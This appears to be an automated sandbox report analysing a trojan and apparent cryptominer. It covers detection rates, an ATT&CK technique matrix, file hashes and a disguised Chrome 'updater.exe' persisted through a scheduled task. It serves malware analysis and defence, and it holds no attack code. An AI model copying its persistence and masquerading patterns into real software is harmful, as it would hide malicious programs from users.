Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Windows Service	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	1 Obfuscated Files or Information	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Windows Service	1 Install Root Certificate	NTDS	231 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	813 Process Injection	11 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Rootkit	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	813 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
ylVAEHbMLf.exe	55%	ReversingLabs	Win64.Trojan.Whisperer
ylVAEHbMLf.exe	100%	Avira	HEUR/AGEN.1329646
ylVAEHbMLf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp	100%	Avira	HEUR/AGEN.1362356
C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	100%	Avira	HEUR/AGEN.1329646
C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	55%	ReversingLabs	Win64.Trojan.Whisperer

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1819526785.000001FA481B0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.msocsp.	lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq	svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	svchost.exe, 00000012.00000002.2989122565.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micft.cMicRosof	powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.7
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528506
Start date and time:	2024-10-08 00:25:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	32
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ylVAEHbMLf.exe renamed because original name is a hash value
Original Sample Name:	3fb477ee2214bf2d4ed7df2d23f159e8.exe
Detection:	MAL
Classification:	mal100.troj.evad.mine.winEXE@24/79@0/2
EGA Information:	Successful, ratio: 89.5%
HCA Information:	Successful, ratio: 62% Number of executed functions: 72 Number of non-executed functions: 390
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, WmiPrvSE.exe, schtasks.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2872 because it is empty
Execution Graph export aborted for target ylVAEHbMLf.exe, PID 6952 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: ylVAEHbMLf.exe

Simulations

Behavior and APIs

Time	Type	Description
18:26:47	API Interceptor	1x Sleep call for process: ylVAEHbMLf.exe modified
18:26:48	API Interceptor	91x Sleep call for process: powershell.exe modified
18:27:01	API Interceptor	1x Sleep call for process: updater.exe modified
18:27:24	API Interceptor	355057x Sleep call for process: winlogon.exe modified
18:27:25	API Interceptor	275767x Sleep call for process: lsass.exe modified
18:27:26	API Interceptor	5801x Sleep call for process: svchost.exe modified
18:27:28	API Interceptor	333346x Sleep call for process: dwm.exe modified
18:27:40	API Interceptor	1155x Sleep call for process: dialer.exe modified
18:27:43	API Interceptor	221x Sleep call for process: spoolsv.exe modified
23:26:56	Task Scheduler	Run new task: HtfsFileManager path: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	bCnarg2O62.exe	Get hash	malicious	SmokeLoader	Browse	192.229.221.95
	9Y6R8fs0wd.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/	Get hash	malicious	Unknown	Browse	192.229.221.95
	PFW1cgN8EK.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==	Get hash	malicious	Unknown	Browse	192.229.221.95
	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	utmggBCMML.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	Bn7LPdQA1s.exe	Get hash	malicious	LummaC, Vidar	Browse	192.229.221.95
	https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ==	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ==	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4r1h5sgd.ykz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vq0xx0a.iij.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmqbykxu.pgm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eymdjyc1.abr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbjjoq4b.rpe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfzibsx3.xyg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5qmnddi.kvm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1zkfp5t.vkr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_md4nxhqm.jbz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfctb52a.40a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og042ud3.2x3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oq1gmedo.efo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1wrrvnu.y00.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_re5qjll5.sre.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
